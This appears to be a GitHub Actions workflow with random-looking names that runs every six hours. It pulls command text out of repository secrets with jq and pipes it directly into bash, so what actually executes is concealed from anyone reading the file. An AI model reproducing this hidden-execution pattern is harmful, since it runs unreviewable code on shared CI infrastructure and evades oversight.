name: dugubu6789
on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dugubu6789
        env:
          e20307: ${{ secrets.e20307 }}
        run: |
          echo $e20307 | jq -r .oyh573 | /bin/bash
          echo $cbqz8 | jq -r .q3 | /bin/bash
          echo $zhwf6 | jq -r .dmvec5404 | /bin/bash
          echo $ytx0909 | jq -r .cll4800 | /bin/bash
          echo $ygt87 | jq -r .eoohn793 | /bin/bash
          echo $gvdp4 | jq -r .gusds823 | /bin/bash

